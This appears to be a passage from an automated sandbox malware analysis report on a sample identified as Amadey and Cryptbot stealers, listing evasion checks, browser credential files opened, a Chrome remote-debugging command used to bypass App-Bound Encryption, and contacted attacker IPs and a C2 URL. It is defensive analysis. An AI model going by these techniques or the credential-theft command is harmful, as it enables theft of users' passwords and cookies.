Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7848 Thread sleep time: -64032s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7820 Thread sleep count: 1423 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7820 Thread sleep time: -2847423s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7796 Thread sleep count: 385 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7796 Thread sleep time: -11550000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8000 Thread sleep time: -180000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7828 Thread sleep count: 1400 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7828 Thread sleep time: -2801400s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7824 Thread sleep count: 1404 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7824 Thread sleep time: -2809404s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008392001\f7fa65d988.exe TID: 8112 Thread sleep time: -38019s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008392001\f7fa65d988.exe TID: 8116 Thread sleep time: -42021s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008392001\f7fa65d988.exe TID: 8108 Thread sleep time: -44022s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008392001\f7fa65d988.exe TID: 8104 Thread sleep time: -38019s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Users\user\AppData\Local\Temp\1008392001\f7fa65d988.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\file.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread delayed: delay time: 30000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread delayed: delay time: 180000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008392001\f7fa65d988.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cache2\entries\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008392001\f7fa65d988.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008392001\f7fa65d988.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008392001\f7fa65d988.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cache2\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008392001\f7fa65d988.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008392001\f7fa65d988.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cache2\doomed\ Jump to behavior
Source: skotes.exe, skotes.exe, 00000006.00000002.2923958701.0000000000B56000.00000040.00000001.01000000.00000007.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: skotes.exe, 00000006.00000002.2925443707.00000000014E7000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000006.00000002.2925443707.0000000001529000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: file.exe, 00000000.00000002.1716978686.0000000000EB6000.00000040.00000001.01000000.00000003.sdmp, skotes.exe, 00000001.00000002.1745303952.0000000000B56000.00000040.00000001.01000000.00000007.sdmp, skotes.exe, 00000002.00000002.1763922405.0000000000B56000.00000040.00000001.01000000.00000007.sdmp, skotes.exe, 00000006.00000002.2923958701.0000000000B56000.00000040.00000001.01000000.00000007.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: chrome.exe, 00000009.00000002.2830020854.0000018B8F758000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll\\P.P
Source: C:\Users\user\Desktop\file.exe System information queried: ModuleInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging
barindex
Hides threads from debuggers
Source: C:\Users\user\Desktop\file.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008392001\f7fa65d988.exe Thread information set: HideFromDebugger Jump to behavior
Potentially malicious time measurement code found
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_04D004E1 Start: 04D00562 End: 04D004AE 0_2_04D004E1
Tries to detect sandboxes and other dynamic analysis tools (window names)
Source: C:\Users\user\AppData\Local\Temp\1008392001\f7fa65d988.exe Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\1008392001\f7fa65d988.exe Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\1008392001\f7fa65d988.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\1008392001\f7fa65d988.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\1008392001\f7fa65d988.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\1008392001\f7fa65d988.exe Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\1008392001\f7fa65d988.exe Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\1008392001\f7fa65d988.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Checks for debuggers (devices)
Source: C:\Users\user\AppData\Local\Temp\1008392001\f7fa65d988.exe File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\1008392001\f7fa65d988.exe File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\1008392001\f7fa65d988.exe File opened: SIWVID
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008392001\f7fa65d988.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008392001\f7fa65d988.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008392001\f7fa65d988.exe Process queried: DebugPort Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_04D007D8 rdtsc 0_2_04D007D8
Contains functionality to read the PEB
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_0099652B mov eax, dword ptr fs:[00000030h] 6_2_0099652B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_0099A302 mov eax, dword ptr fs:[00000030h] 6_2_0099A302
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1008392001\f7fa65d988.exe "C:\Users\user\AppData\Local\Temp\1008392001\f7fa65d988.exe" Jump to behavior
Source: skotes.exe, skotes.exe, 00000006.00000002.2923958701.0000000000B56000.00000040.00000001.01000000.00000007.sdmp Binary or memory string: PProgram Manager
Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_0097D3E2 cpuid 6_2_0097D3E2
Queries information about the installed CPU (vendor, model number etc)
Source: C:\Users\user\AppData\Local\Temp\1008392001\f7fa65d988.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1008392001\f7fa65d988.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1008392001\f7fa65d988.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008392001\f7fa65d988.exe Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008392001\f7fa65d988.exe Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008392001\f7fa65d988.exe Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008392001\f7fa65d988.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008392001\f7fa65d988.exe Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_0097CBEA GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime, 6_2_0097CBEA
Source: C:\Users\user\AppData\Local\Temp\1008392001\f7fa65d988.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information
barindex
Yara detected Amadeys stealer DLL
Source: Yara match File source: 0.2.file.exe.cc0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.skotes.exe.960000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.skotes.exe.960000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.skotes.exe.960000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000001.00000003.1704826210.0000000004BF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.1673233222.0000000004B30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.2274009732.00000000052A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1716902262.0000000000CC1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.2923737687.0000000000961000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.1723341065.0000000005180000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.1745233111.0000000000961000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.1763773337.0000000000961000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Yara detected Cryptbot
Source: Yara match File source: dump.pcap, type: PCAP
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\AppData\Local\Temp\1008392001\f7fa65d988.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008392001\f7fa65d988.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008392001\f7fa65d988.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008392001\f7fa65d988.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008392001\f7fa65d988.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008392001\f7fa65d988.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior

Remote Access Functionality
barindex
Attempt to bypass Chrome Application-Bound Encryption
Source: C:\Users\user\AppData\Local\Temp\1008392001\f7fa65d988.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default"
Yara detected Cryptbot
Source: Yara match File source: dump.pcap, type: PCAP
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 1561382 Sample: file.exe Startdate: 23/11/2024 Architecture: WINDOWS Score: 100 54 Multi AV Scanner detection for domain / URL 2->54 56 Suricata IDS alerts for network traffic 2->56 58 Found malware configuration 2->58 60 12 other signatures 2->60 8 skotes.exe 16 2->8         started        13 file.exe 5 2->13         started        15 skotes.exe 2->15         started        process3 dnsIp4 46 185.215.113.43, 49743, 49754, 49781 WHOLESALECONNECTIONSNL Portugal 8->46 48 31.41.244.11, 49755, 80 AEROEXPRESS-ASRU Russian Federation 8->48 32 C:\Users\user\AppData\...\f7fa65d988.exe, PE32 8->32 dropped 34 C:\Users\user\AppData\Local\...\random[1].exe, PE32 8->34 dropped 76 Hides threads from debuggers 8->76 78 Tries to detect sandboxes / dynamic malware analysis system (registry check) 8->78 80 Tries to detect process monitoring tools (Task Manager, Process Explorer etc.) 8->80 17 f7fa65d988.exe 5 2 8->17         started        36 C:\Users\user\AppData\Local\...\skotes.exe, PE32 13->36 dropped 38 C:\Users\user\...\skotes.exe:Zone.Identifier, ASCII 13->38 dropped 82 Detected unpacking (changes PE section rights) 13->82 84 Tries to evade debugger and weak emulator (self modifying code) 13->84 86 Tries to detect virtualization through RDTSC time measurements 13->86 88 Potentially malicious time measurement code found 13->88 22 skotes.exe 13->22         started        file5 signatures6 process7 dnsIp8 40 fvtekk5pn.top 34.116.198.130, 49782, 80 GOOGLE-AS-APGoogleAsiaPacificPteLtdSG United States 17->40 42 127.0.0.1 unknown unknown 17->42 44 home.fvtekk5pn.top 17->44 30 C:\Users\user\AppData\...\service123.exe, PE32 17->30 dropped 62 Antivirus detection for dropped file 17->62 64 Multi AV Scanner detection for dropped file 17->64 66 Attempt to bypass Chrome Application-Bound Encryption 17->66 74 6 other signatures 17->74 24 chrome.exe 17->24         started        68 Detected unpacking (changes PE section rights) 22->68 70 Machine Learning detection for dropped file 22->70 72 Tries to evade debugger and weak emulator (self modifying code) 22->72 file9 signatures10 process11 dnsIp12 50 239.255.255.250 unknown Reserved 24->50 27 chrome.exe 24->27         started        process13 dnsIp14 52 www.google.com 172.217.21.36 GOOGLEUS United States 27->52
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
185.215.113.43
 unknown Portugal
206894 WHOLESALECONNECTIONSNL true
239.255.255.250
 unknown Reserved
unknown unknown false
34.116.198.130
 home.fvtekk5pn.top United States
139070 GOOGLE-AS-APGoogleAsiaPacificPteLtdSG false
172.217.21.36
 www.google.com United States
15169 GOOGLEUS false
31.41.244.11
 unknown Russian Federation
61974 AEROEXPRESS-ASRU false

Private

IP
127.0.0.1

Contacted Domains

Name IP Active
home.fvtekk5pn.top 34.116.198.130 true
www.google.com 172.217.21.36 true
fvtekk5pn.top 34.116.198.130 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://home.fvtekk5pn.top/LCXOUUtXgrKhKDLYSbzW1732019347 false
    		high